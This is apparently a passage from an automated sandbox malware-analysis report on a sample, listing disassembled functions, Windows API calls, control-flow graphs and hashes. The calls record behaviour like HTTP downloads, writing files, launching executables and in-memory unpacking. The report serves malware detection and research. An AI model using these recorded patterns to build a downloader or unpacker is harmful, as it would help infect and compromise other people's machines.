                                                  • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                  • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                  • String ID: GET$http://
                                                  • API String ID: 1233269984-1632879366
                                                  • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                  • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                                  Function 00401740 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                                    • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                                  Strings
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                                  • text, xrefs: 00401B5C
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                                  • GET, xrefs: 00401F81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                                  • API String ID: 2146599340-3782612381
                                                  • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                  • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                                  • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                  • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5
                                                  Function 00E9003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 942 e9003c-e90047 943 e90049 942->943 944 e9004c-e90263 call e90a3f call e90e0f call e90d90 VirtualAlloc 942->944 943->944 959 e9028b-e90292 944->959 960 e90265-e90289 call e90a69 944->960 961 e902a1-e902b0 959->961 964 e902ce-e903c2 VirtualProtect call e90cce call e90ce7 960->964 961->964 965 e902b2-e902cc 961->965 971 e903d1-e903e0 964->971 965->961 972 e90439-e904b8 VirtualFree 971->972 973 e903e2-e90437 call e90ce7 971->973 974 e904be-e904cd 972->974 975 e905f4-e905fe 972->975 973->971 977 e904d3-e904dd 974->977 978 e9077f-e90789 975->978 979 e90604-e9060d 975->979 977->975 983 e904e3-e90505 LoadLibraryA 977->983 981 e9078b-e907a3 978->981 982 e907a6-e907b0 978->982 979->978 984 e90613-e90637 979->984 981->982 986 e9086e-e908be LoadLibraryA 982->986 987 e907b6-e907cb 982->987 988 e90517-e90520 983->988 989 e90507-e90515 983->989 990 e9063e-e90648 984->990 994 e908c7-e908f9 986->994 991 e907d2-e907d5 987->991 992 e90526-e90547 988->992 989->992 990->978 993 e9064e-e9065a 990->993 995 e90824-e90833 991->995 996 e907d7-e907e0 991->996 997 e9054d-e90550 992->997 993->978 998 e90660-e9066a 993->998 999 e908fb-e90901 994->999 1000 e90902-e9091d 994->1000 1006 e90839-e9083c 995->1006 1001 e907e2 996->1001 1002 e907e4-e90822 996->1002 1003 e905e0-e905ef 997->1003 1004 e90556-e9056b 997->1004 1005 e9067a-e90689 998->1005 999->1000 1001->995 1002->991 1003->977 1007 e9056d 1004->1007 1008 e9056f-e9057a 1004->1008 1009 e9068f-e906b2 1005->1009 1010 e90750-e9077a 1005->1010 1006->986 1011 e9083e-e90847 1006->1011 1007->1003 1013 e9059b-e905bb 1008->1013 1014 e9057c-e90599 1008->1014 1015 e906ef-e906fc 1009->1015 1016 e906b4-e906ed 1009->1016 1010->990 1017 e90849 1011->1017 1018 e9084b-e9086c 1011->1018 1025 e905bd-e905db 1013->1025 1014->1025 1019 e9074b 1015->1019 1020 e906fe-e90748 1015->1020 1016->1015 1017->986 1018->1006 1019->1005 1020->1019 1025->997
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00E9024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 545822cb2809944e8227267bbb895ca9bc43e0c6234885531ea69000ceeeaa55
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: C9526874A01229DFDB64CF98C984BA8BBB1BF09314F5480D9E94DAB351DB30AE85DF14
                                                  Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1082 10001175-100011a6 call 1000e8e7 1085 100011a8-100011b0 call 1000270d 1082->1085 1086 100011bf 1082->1086 1089 100011b5-100011bd 1085->1089 1088 100011c5-100011dd InternetSetFilePointer 1086->1088 1090 100011e3-1000121b InternetReadFile 1088->1090 1089->1088 1091 10001253-1000125a 1090->1091 1092 1000121d-1000124d call 1000270d call 100050e0 call 10002724 1090->1092 1093 10001260-100012a0 call 10003c40 HttpQueryInfoA 1091->1093 1094 1000125c-1000125e 1091->1094 1092->1091 1100 100012a6-100012d2 CoCreateInstance 1093->1100 1101 1000150a-10001520 call 1000e8a5 1093->1101 1094->1090 1094->1093 1100->1101 1103 100012d8-100012df 1100->1103 1103->1101 1107 100012e5-10001316 call 1000184b call 10001006 1103->1107 1113 10001318 1107->1113 1114 1000131a-10001351 call 10001c08 call 10001bb9 1107->1114 1113->1114 1120 10001357-1000135e 1114->1120 1121 100014fe-10001505 1114->1121 1120->1121 1122 10001364-100013cc call 1000270d 1120->1122 1121->1101 1126 100013d2-100013e8 1122->1126 1127 100014e6-100014f9 call 10002724 1122->1127 1129 10001486-10001497 1126->1129 1130 100013ee-1000141d call 1000270d 1126->1130 1127->1121 1131 10001499-1000149b 1129->1131 1132 100014dc-100014e4 1129->1132 1141 1000146e-10001483 call 10002724 1130->1141 1142 1000141f-10001421 1130->1142 1135 100014aa-100014ac 1131->1135 1136 1000149d-100014a8 call 10005926 1131->1136 1132->1127 1139 100014c0-100014d1 call 10003c40 call 10005926 1135->1139 1140 100014ae-100014be call 100050e0 1135->1140 1152 100014d7 call 1000584c 1136->1152 1139->1152 1140->1132 1141->1129 1143 10001423-10001425 1142->1143 1144 10001434-10001447 call 10003c40 1142->1144 1143->1144 1149 10001427-10001432 call 100050e0 1143->1149 1161 10001456-1000145c 1144->1161 1162 10001449-10001454 call 10005926 1144->1162 1149->1141 1152->1132 1161->1141 1164 1000145e-10001463 call 10005926 1161->1164 1167 10001469 call 1000584c 1162->1167 1164->1167 1167->1141
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                  • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                  • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                  • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                  • String ID: text
                                                  • API String ID: 1154000607-999008199
                                                  • Opcode ID: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                                  • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                  • Opcode Fuzzy Hash: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
                                                  • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                  Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                    • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: .exe$open
                                                  • API String ID: 1627157292-49952409
                                                  • Opcode ID: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                                  • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                  • Opcode Fuzzy Hash: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
                                                  • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                                  Function 0099E632 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1237 99e632-99e634 1238 99e63b-9a378e 1237->1238 1239 99e636-99e63a 1237->1239 1239->1238
                                                  APIs
                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A13AD
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A13D4
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009A142B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Open$InfoNativeSystem
                                                  • String ID: q8G
                                                  • API String ID: 1247124224-421552133
                                                  • Opcode ID: 3127e44c745c3bfe62092e1b7af0654af5ffaa25da2a9177e2eb2e7a390dac50
                                                  • Instruction ID: af390be659cd7a065f6d021e451f1e16c0de109d5d9845524834568700291a7a
                                                  • Opcode Fuzzy Hash: 3127e44c745c3bfe62092e1b7af0654af5ffaa25da2a9177e2eb2e7a390dac50
                                                  • Instruction Fuzzy Hash: E2519CB140820DDFEB11EF54C845BEE7BE8EF16700F11082AE981C6951D77A4CA4DF9A
                                                  Function 00401D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1243 401d60-401dae 1244 401db2-401db7 1243->1244 1244->1244 1245 401db9-402013 call 402470 call 402650 call 402470 call 40a3e0 call 40c34c InternetOpenA 1244->1245 1260 402015-402021 1245->1260 1261 40203d-40205a call 408ec2 1245->1261 1262 402033-40203a call 409027 1260->1262 1263 402023-402031 1260->1263 1262->1261 1263->1262 1265 402062-402099 call 40c26f call 401d60 1263->1265
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: http://
                                                  • API String ID: 0-1121587658
                                                  • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                  • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                                  • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                  • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4
                                                  Function 009A09DD Relevance: 4.6, APIs: 3, Instructions: 78registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1274 9a09dd-9a1398 1279 9a139a-9a13b5 RegOpenKeyA 1274->1279 1280 9a13c1-9a13dc RegOpenKeyA 1274->1280 1279->1280 1284 9a13b7 1279->1284 1281 9a13de-9a13e8 1280->1281 1282 9a13f4-9a1420 1280->1282 1281->1282 1287 9a142d-9a1437 1282->1287 1288 9a1422-9a142b GetNativeSystemInfo 1282->1288 1284->1280 1289 9a1439 1287->1289 1290 9a1443-9a1451 1287->1290 1288->1287 1289->1290 1292 9a145d-9a1464 1290->1292 1293 9a1453 1290->1293 1294 9a146a-9a1471 1292->1294 1295 9a1477-9a33d8 1292->1295 1293->1292 1294->1295 1296 9a25c7-9a25ce 1294->1296 1298 9a2957-9a29c4 1296->1298 1299 9a25d4-9a26fd 1296->1299 1299->1298
                                                  APIs
                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A13AD
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A13D4
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009A142B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Open$InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1247124224-0
                                                  • Opcode ID: 1f712ebb557d6817bb4969cdeefa09ec25fde8190f5539b27e24dfff6b464320
                                                  • Instruction ID: 1f1f24977d9f488b3bf603c6d320b77e36f51279db56f09f654e4336b10fa93e
                                                  • Opcode Fuzzy Hash: 1f712ebb557d6817bb4969cdeefa09ec25fde8190f5539b27e24dfff6b464320
                                                  • Instruction Fuzzy Hash: 70314AB150814EDFEF11DF64D848BEE3BA8EF06311F00042AEA81C6950DBB64DA4DF99
                                                  Function 009A1326 Relevance: 4.6, APIs: 3, Instructions: 71registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1302 9a1326-9a132d 1303 9a132f-9a19ac 1302->1303 1304 9a1387 1302->1304 1311 9a33ca-9a33d8 1303->1311 1306 9a1389-9a1398 1304->1306 1307 9a13a1-9a13b5 RegOpenKeyA 1304->1307 1308 9a13c1-9a13dc RegOpenKeyA 1306->1308 1310 9a139a-9a13a0 1306->1310 1307->1308 1309 9a13b7 1307->1309 1312 9a13de-9a13e8 1308->1312 1313 9a13f4-9a1420 1308->1313 1309->1308 1310->1307 1312->1313 1316 9a142d-9a1437 1313->1316 1317 9a1422-9a142b GetNativeSystemInfo 1313->1317 1318 9a1439 1316->1318 1319 9a1443-9a1451 1316->1319 1317->1316 1318->1319 1321 9a145d-9a1464 1319->1321 1322 9a1453 1319->1322 1323 9a146a-9a1471 1321->1323 1324 9a1477 1321->1324 1322->1321 1323->1324 1325 9a25c7-9a25ce 1323->1325 1324->1311 1326 9a2957-9a29c4 1325->1326 1327 9a25d4-9a26fd 1325->1327 1327->1326
                                                  APIs
                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A13AD
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A13D4
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009A142B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Open$InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1247124224-0
                                                  • Opcode ID: fc3de22f46869f494cdf149f1ae32b030c685a6104f6981cd5ccc39c61c65638
                                                  • Instruction ID: 7532480cc15b837e64dc1bdd8f00c2f221b40b21e06bcf2f4d0506f82f163a01
                                                  • Opcode Fuzzy Hash: fc3de22f46869f494cdf149f1ae32b030c685a6104f6981cd5ccc39c61c65638
                                                  • Instruction Fuzzy Hash: 67215A7150414E9EEF21DFA0C848BEF3BACEF0A351F400426EA81C6911DBB64DA4DF99
                                                  Function 004020C0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1330 4020c0-4020db 1331 40213b-40214c call 408ec2 1330->1331 1332 4020dd-4020e1 1330->1332 1332->1331 1333 4020e3-402101 CreateFileA 1332->1333 1333->1331 1335 402103-402130 WriteFile CloseHandle call 408ec2 1333->1335 1338 402135-402138 1335->1338
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040211E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleWrite
                                                  • String ID:
                                                  • API String ID: 1065093856-0
                                                  • Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                  • Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
                                                  • Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                  • Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758
                                                  Function 00E90E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,00E90223,?,?), ref: 00E90E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,00E90223,?,?), ref: 00E90E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: 0f6dc757821242bf246160c9719ebb01f3cfc829a44d2ab6c915127284933777
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 4ED0123514512877DB002A94DC09BCD7B1CDF05B66F408411FB0DE9080C770994046E5
                                                  Function 0099F306 Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 5f478d6f1dfec56bdfd8c41c797b8034519cab6cca5dec901336be7ca60d7b90
                                                  • Instruction ID: f9ec1002ceaddf0a58970e562179875d42c356cae58bedc1571fe76b4886eaff
                                                  • Opcode Fuzzy Hash: 5f478d6f1dfec56bdfd8c41c797b8034519cab6cca5dec901336be7ca60d7b90
                                                  • Instruction Fuzzy Hash: E92138B140DA00DFD304BF29D58557ABBE0EF45710F268D2DE9CA87250D6398A919B87
                                                  Function 00A712E8 Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 00A71BF0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 85bdd5a397a0a194f057cf662d50fb945105e8c4c0dacb4e84a669905b16ad68
                                                  • Instruction ID: 72f2ec000bdfb27a9ec3a9215ed37f16a0277da476f1e4d9122e59be3ee3a743
                                                  • Opcode Fuzzy Hash: 85bdd5a397a0a194f057cf662d50fb945105e8c4c0dacb4e84a669905b16ad68
                                                  • Instruction Fuzzy Hash: F6F0B4B115824CEEE7249F5C8C8AFFB37F8DB00711F58C019B64A899C1F6A16D149F6A
                                                  Function 0041249E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                  • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                                  • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                  • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                                  Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                  • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                  Function 00A92E61 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?), ref: 00A92E91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000A92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A92000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a92000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b1bb3170cdd3b3b7e9b4ca1deb2ba2477b74081c4fdbbab59794a4f8b52866f6
                                                  • Instruction ID: 7c2e343f1b5bf5d46fe4c03b33de66a518670460b4edbce007a12b827fa41a56
